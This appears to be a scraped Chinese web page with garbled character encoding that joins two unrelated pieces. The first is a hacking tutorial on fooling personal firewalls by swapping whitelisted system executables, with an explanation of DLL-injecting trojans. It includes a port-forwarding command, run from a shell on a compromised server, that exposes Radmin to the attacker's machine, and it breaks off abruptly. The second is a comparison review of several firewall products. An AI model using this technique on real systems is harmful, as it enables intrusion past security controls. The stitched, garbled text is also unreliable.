一直以來都有一個夢想：偶要是能發(fā)現(xiàn)些漏洞或BUG什么的該多好啊！于是整天對著電腦瞎弄瞎研究，研究什么呢？研究如何突破防火墻（偶這里指的防火墻是軟體型的個人防火墻，硬件的偶也沒條件。）嘿嘿，你還別說，還真沒白研究，還真給偶發(fā)現(xiàn)了大多數(shù)防火墻的通病。這個BUG能讓我們欺騙防火墻來達(dá)到訪外的目的，具體情況是怎么樣的呢？請看下面的解說！
首先，我要介紹一下Windows系統(tǒng)特性，當(dāng)一個程序運(yùn)行時，它不能刪除，但卻能夠改名！而當(dāng)系統(tǒng)里的被保護(hù)程序遭到刪除或損壞或改名時系統(tǒng)就會及時調(diào)用備份文件給予還原！我再講講防火墻，大家都知道許多防火墻的“應(yīng)用程序規(guī)則”里一般默認(rèn)就會讓IE瀏覽器（iexplore.exe）、Outlook Express（msimn.exe）、lsass.exe、spoolsv.exe、MSTask.exe、winlogon.exe、 services.exe、svchost.exe通過，而大多的防火墻認(rèn)為只要是與規(guī)則里的路徑及文件名相同就Pass！以這樣的檢測方法來決定是否放行，但它卻完全沒考慮到如果是別的文件替換的呢？——就相當(dāng)于古裝片里的易容術(shù)，易容后就認(rèn)不得了！這就給了我們機(jī)會，我們可以利用這個BUG來欺騙防火墻來達(dá)到訪外的目的！
小知識：其實(shí)現(xiàn)在大多木馬采用的DLL插線程技術(shù)也就是利用了這個原理，它們首先隱蔽的開啟一個認(rèn)證放行的程序進(jìn)程（如Iexplore.exe進(jìn)程），接著把DLL型木馬插入這個線程內(nèi)，然后訪外時就可輕松突破防火墻的限制了——因?yàn)榉阑饓κ遣粫r截已認(rèn)證放行的程序的。
原理講完了，我們現(xiàn)在講講該如何利用這個BUG了！這里我用虛擬機(jī)做實(shí)驗(yàn)，制造如下條件：
為了更符合現(xiàn)實(shí)，我給服務(wù)器安裝了“天網(wǎng)防火墻”、Radmin（但由于防火墻指定了訪問IP地址，所以沒辦法正常連接！），MSSQL SERVER、Serv-u。首先我們用常用的方法進(jìn)行端口轉(zhuǎn)發(fā)，看看防火墻有什么反應(yīng)！
第一步，啟用AngelShell Ver 1.0里的Fport（用來進(jìn)行端口轉(zhuǎn)發(fā)的服務(wù)端，幾乎可以轉(zhuǎn)發(fā)任何端口），然后在本地用FportClient（用來進(jìn)行端口轉(zhuǎn)發(fā)的客戶端）監(jiān)聽好！
第二步，直接在CMDSHELL里運(yùn)行“e:\www\fport.exe 4899 192.168.1.1 7788”，這時我們看到虛擬機(jī)里的“天網(wǎng)”對Fport馬上進(jìn)行了攔截。
一篇關(guān)于防火墻的沖突的文章
近來試用了比較流行的幾個防火墻，在使用過程中進(jìn)行了一些比較，記下了些文字，希望對一些不知道該如何選擇的提供一些參考。同時希望交流，共同提高。
只是比較之用，沒有廣告之意。使用全在各有所愛。
一.Kaspersky(卡巴斯基)防火墻（Kaspersky Anti-Hacker）
1.設(shè)置簡單，和Kaspersky(卡巴斯基)殺毒軟件一起使用沒有沖突，與ZoneAlarm Pro version:5.5.094.000運(yùn)行也可以，沒見死機(jī)。
2.內(nèi)存占用小，剛啟動時6M左右，最小時1M不到。
3.可以查看正在打開的端口，正在連接網(wǎng)絡(luò)的應(yīng)用程序及連接地址、端口。
4.可以為每個程序定義規(guī)則（阻止、允許）及安全類型（瀏覽、文件傳送、信息發(fā)送等等）。發(fā)現(xiàn)有程序連接時會提示，并允許選擇自定義。
5.可以定義包過濾規(guī)則。默認(rèn)已經(jīng)定義一些。不過自定義的包過濾規(guī)則有點(diǎn)簡單。在一條規(guī)則定義幾個端口時不太方便（只能選單個或區(qū)間）。
6.本地連接的時候沒有提示。比如通過代理軟件上網(wǎng)，瀏覽器再通過代理軟件連接的時候不會對瀏覽器連接網(wǎng)絡(luò)進(jìn)行提示。
二、ZoneAlarm Pro 5.5.094
1.資源占用較大，兩個進(jìn)程，zlclient.exe占用4M左右， vsmon.exe占用9M左右。啟動還算快。和Kaspersky(卡巴斯基)殺毒軟件共處相安無事，和Norton防病毒軟件一起工作正常。和 Sygate Personal Firewall可能有沖突。
2.默認(rèn)設(shè)置還算簡單，按默認(rèn)設(shè)置即可阻止很多可疑連接。
3.功能強(qiáng)大，廣告過濾，郵件過濾都不錯。可對每一程序設(shè)置連接規(guī)則。
4、防火墻的專家設(shè)置項(xiàng)可以完成難度比較大的規(guī)則設(shè)置，設(shè)置規(guī)則還算簡單，根據(jù)參考可以自定義完成。
5、升級到6.0后資源占用變得很大，啟動響應(yīng)比較慢。
6、對于網(wǎng)關(guān)的ARP保護(hù)并沒有效果，同局域網(wǎng)機(jī)器可以使用ARP欺騙進(jìn)行攻擊致使無法上網(wǎng)。使用專家項(xiàng)設(shè)置IP和MAC綁定也無效果。經(jīng)查ZoneAlarm 存在一個安全問題，允許未授權(quán)用戶在本地局域網(wǎng)安全設(shè)置下連接到該防火墻保護(hù)的主機(jī)。
三、F-Secure Distributed Firewall 5.5
與天網(wǎng)發(fā)生沖突，安裝第一次重新啟動后出現(xiàn)藍(lán)屏然后重啟。提示信息表示與sknfw.sys文件有關(guān)。最后沒有使用就刪除了，可惜。
四、Outpost Firewall pro 2.7.492.416
1、與天網(wǎng)發(fā)生沖突，安裝第一次重新啟動后出現(xiàn)藍(lán)屏然后重啟。提示信息表示與sknfw.sys文件有關(guān)。刪除sknfw.sys后再重新安裝則沒有出現(xiàn)這個問題。
2、與ZoneAlarm Pro有沖突，可以同時安裝兩個，不過只能運(yùn)行其中一個，不然出現(xiàn)死機(jī)。與McAfee.VirusScan.Enterprise.v80共處沒有出現(xiàn)什么沖突。
3、啟動后只有一個進(jìn)程outpost.exe，Outpost占用內(nèi)存極小，剛啟動時20M左右，最小化正常后只有2M左右。
4、功能強(qiáng)大，設(shè)置復(fù)雜。不過按其默認(rèn)設(shè)置基本上可以滿足上網(wǎng)要求。
5、可以查看正在連接網(wǎng)絡(luò)的應(yīng)用程序、連接IP、端口，系統(tǒng)正在打開的端口。已經(jīng)發(fā)送和接收的TCP，UDP數(shù)據(jù)流量。阻止的各項(xiàng)統(tǒng)計(jì)。
6、支持插件，默認(rèn)安裝了active content,ads,attachment quarantine,attack detection,content,dns cache等插件。使用較多的是active content（包括pop-up windows,activeX controls,javascripts,vbscripts,cookies等的過濾設(shè)置）和ads（廣告過濾，